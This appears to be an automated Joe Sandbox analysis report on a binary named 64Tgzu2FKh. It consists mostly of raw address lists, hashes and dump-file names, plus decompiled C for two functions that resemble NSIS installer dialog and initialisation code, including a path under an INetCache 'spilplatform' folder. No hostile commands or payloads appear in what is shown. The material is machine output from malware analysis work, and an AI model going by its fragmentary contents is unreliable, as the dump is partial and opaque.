0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00000000
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00000000
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00406d13
0x00406d17
0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00000000
0x00406d2e
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00406c4d
0x00406c4d
0x00406c50
0x00000000
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00000000
0x00406fbf
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x00000000
0x00407132
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00000000
0x00406f87
0x00406f85
0x004071ba
0x00000000
0x00000000
0x004067e9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D08(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x4236d0 = _t37;
					if(_t118 == 0x110) {
						 *0x42a208 = _t128;
						 *0x4236e4 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216b0 = _t94;
						E004041E1(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x4291e8);
						 *0x4291cc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x4236d0 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a240;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E0040422D(0x40b);
						while(1) {
							_t39 =  *0x4236d0;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x42a244;
							if(_t41 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291cc - _t136;
							if( *0x4291cc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040626E(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041E1(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ac - _t136;
							_v32 = _t51;
							if( *0x42a2ac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404203(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216b0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x4236e4);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216b0);
							}
							E00404216();
							E0040624C(0x4236e8, E00403CE9());
							E0040626E(0x4236e8, _t128, _t133,  &(0x4236e8[lstrlenW(0x4236e8)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x4236e8); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291d8); // executed
									 *0x4226c0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a200,  *_t133 +  *0x4291e0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "~C@"), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x4291d8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041E1(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x4291d8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291cc - _t136;
									if( *0x4291cc != _t136) {
										goto L61;
									}
									ShowWindow( *0x4291d8, 8); // executed
									E0040422D(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4291d8);
						 *0x42a208 = _t136;
						EndDialog(_t128,  *0x421eb8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x4291d8, 0x40f, 0, 1);
						__eflags =  *0x4291cc;
						return 0 |  *0x4291cc == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x4236c8, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x4236c8,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00404248(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x4291d8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ac - _t136;
										if( *0x42a2ac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421eb8 = 1;
											L21:
											_push(0x78);
											L22:
											E004041BA();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421eb8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x4291d8);
						 *0x4291d8 = _a12;
						L58:
						_t144 =  *0x4256e8 - _t136; // 0x1
						if(_t144 == 0 &&  *0x4291d8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x4256e8 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d11
0x00403d1a
0x00403e5b
0x00403e5f
0x00403e63
0x00403e65
0x00403e6a
0x00403e75
0x00403e80
0x00403e85
0x00403e87
0x00403e89
0x00403e8c
0x00403e91
0x00403e9f
0x00403eac
0x00403eb3
0x00403eb3
0x00403eb4
0x00403eb4
0x00403eb9
0x00403ebf
0x00403ec6
0x00403ecc
0x00403ece
0x00403f0e
0x00403f13
0x00403f18
0x00403f18
0x00403f1d
0x00403f26
0x00403f28
0x00403f2d
0x00403f33
0x00403f37
0x00403f37
0x00403f3c
0x00403f42
0x00000000
0x00000000
0x00403f4d
0x00403f53
0x00000000
0x00000000
0x00403f5c
0x00403f64
0x00403f69
0x00403f6c
0x00403f72
0x00403f77
0x00403f7a
0x00403f80
0x00403f85
0x00403f88
0x00403f8e
0x00403f96
0x00403f9c
0x00403fa2
0x00403fa6
0x00403fad
0x00403fad
0x00403fad
0x00403fb7
0x00403fc9
0x00403fd5
0x00403fda
0x00403fe4
0x00403fea
0x00403fec
0x00403ff1
0x00403fee
0x00403fee
0x00403fee
0x00404001
0x00404019
0x0040401b
0x00404021
0x00404036
0x00404023
0x0040402c
0x0040402e
0x0040402e
0x0040403c
0x0040404d
0x00404063
0x0040406a
0x00404070
0x00404074
0x00404079
0x0040407b
0x00000000
0x00404081
0x00404081
0x00404083
0x00000000
0x00000000
0x00404089
0x0040408d
0x004040b2
0x004040b8
0x004040be
0x004040c0
0x00000000
0x00000000
0x004040e6
0x004040ec
0x004040ee
0x004040f3
0x00000000
0x00000000
0x004040f9
0x004040fc
0x004040ff
0x00404116
0x00404122
0x0040413b
0x00404141
0x00404145
0x0040414a
0x00404150
0x00000000
0x00000000
0x0040415a
0x00404165
0x00000000
0x00404165
0x0040408f
0x00404095
0x00000000
0x00000000
0x0040409b
0x004040a1
0x00000000
0x00000000
0x00000000
0x004040a7
0x0040407b
0x00404172
0x0040417e
0x00404185
0x00000000
0x00403ed0
0x00403ed0
0x00403ed3
0x00403f06
0x00403f06
0x00403f08
0x00000000
0x00000000
0x00000000
0x00403f08
0x00403ed5
0x00403ed9
0x00403ede
0x00403ee0
0x00000000
0x00000000
0x00403ef0
0x00403ef8
0x00000000
0x00403efe
0x00403d2c
0x00403d2c
0x00403d30
0x00403d35
0x00403d44
0x00403d44
0x00403d4d
0x00403d56
0x00403d61
0x00403d61
0x00403d6d
0x00403d89
0x00403d8c
0x00403d9f
0x00403da5
0x00403e48
0x00000000
0x00403e51
0x00403dab
0x00403db8
0x00403dba
0x00403dbc
0x00403ddb
0x00403ddb
0x00403dde
0x00403de3
0x00403de6
0x00403df6
0x00403df7
0x00403df9
0x00403e2f
0x00403e42
0x00000000
0x00403e42
0x00403dfb
0x00403e01
0x00403e1a
0x00403e1f
0x00403e21
0x00000000
0x00000000
0x00403e23
0x00403e0f
0x00403e0f
0x00403e11
0x00403e11
0x00000000
0x00403e11
0x00403e04
0x00403e09
0x00000000
0x00403e09
0x00403de8
0x00403dee
0x00000000
0x00000000
0x00403df0
0x00000000
0x00403df0
0x00403de0
0x00000000
0x00403de0
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dd5
0x00000000
0x00000000
0x00000000
0x00403dd5
0x00403d91
0x00000000
0x00403d6f
0x00403d75
0x00403d7f
0x0040418b
0x0040418b
0x00404191
0x0040419e
0x004041a4
0x004041a4
0x004041ae
0x00000000
0x004041ae
0x00403d6d

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
ShowWindow.USER32(?), ref: 00403D61
DestroyWindow.USER32 ref: 00403D75
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
GetDlgItem.USER32(?,?), ref: 00403DB2
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
IsWindowEnabled.USER32(00000000), ref: 00403DCD
GetDlgItem.USER32(?,00000001), ref: 00403E7B
GetDlgItem.USER32(?,00000002), ref: 00403E85
SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
GetDlgItem.USER32(?,00000003), ref: 00403F96
ShowWindow.USER32(00000000,?), ref: 00403FB7
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
EnableWindow.USER32(?,?), ref: 00403FE4
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
EnableMenuItem.USER32(00000000), ref: 00404001
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
SetWindowTextW.USER32(?,004236E8), ref: 0040406A
ShowWindow.USER32(?,0000000A), ref: 0040419E

Strings

6B, xrefs: 00404046

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 6B
API String ID: 3282139019-4127139157
Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040395A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a214;
				_t22 = E00406626(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x4236e8;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040611A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x4236e8, 0);
					__eflags =  *0x4236e8;
					if(__eflags == 0) {
						E0040611A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x4236e8, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406193(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C30(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth";
				 *0x42a2a0 =  *0x42a21c & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405C25(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") != 0) {
					L16:
					if(E00405C25(_t98, _t86) == 0) {
						E0040626E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a200, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x4291e8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C30(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E00405383(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291cc;
								if( *0x4291cc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236c8, 5); // executed
							_t39 = E004065B6("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065B6("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291a0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291a0);
								 *0x4291c4 = _t87;
								RegisterClassW(0x4291a0);
							}
							_t44 = DialogBoxParamW( *0x42a200,  *0x4291e0 + 0x00000069 & 0x0000ffff, 0, E00403D08, 0); // executed
							E004038AA(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a200;
						 *0x4291a4 = E00401000;
						 *0x4291b0 =  *0x42a200;
						 *0x4291b4 = _t30;
						 *0x4291c4 = 0x40a380;
						if(RegisterClassW(0x4291a0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236c8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a200, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281a0;
					E0040611A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281a0, 0);
					_t63 =  *0x4281a0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281a2;
						 *((short*)(E00405B4A(0x4281a2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040624C(_t86, E00405B1D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B69(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403960
0x00403969
0x00403970
0x00403972
0x00403986
0x00403998
0x004039a1
0x004039aa
0x004039b1
0x004039b6
0x004039bd
0x004039d0
0x004039d0
0x004039db
0x00403974
0x0040397f
0x0040397f
0x004039e0
0x004039ea
0x004039f3
0x004039f8
0x00403a09
0x00403a9b
0x00403aa3
0x00403aac
0x00403aac
0x00403ac2
0x00403ac8
0x00403ad6
0x00403b57
0x00403b5f
0x00403b69
0x00403b6e
0x00403b74
0x00403bfe
0x00403c03
0x00403c05
0x00403c21
0x00000000
0x00403c21
0x00403c07
0x00403c0d
0x00403c15
0x00403c15
0x00000000
0x00403c0d
0x00403b82
0x00403b8d
0x00403b92
0x00403b94
0x00403b9b
0x00403b9b
0x00403ba6
0x00403bae
0x00403bb0
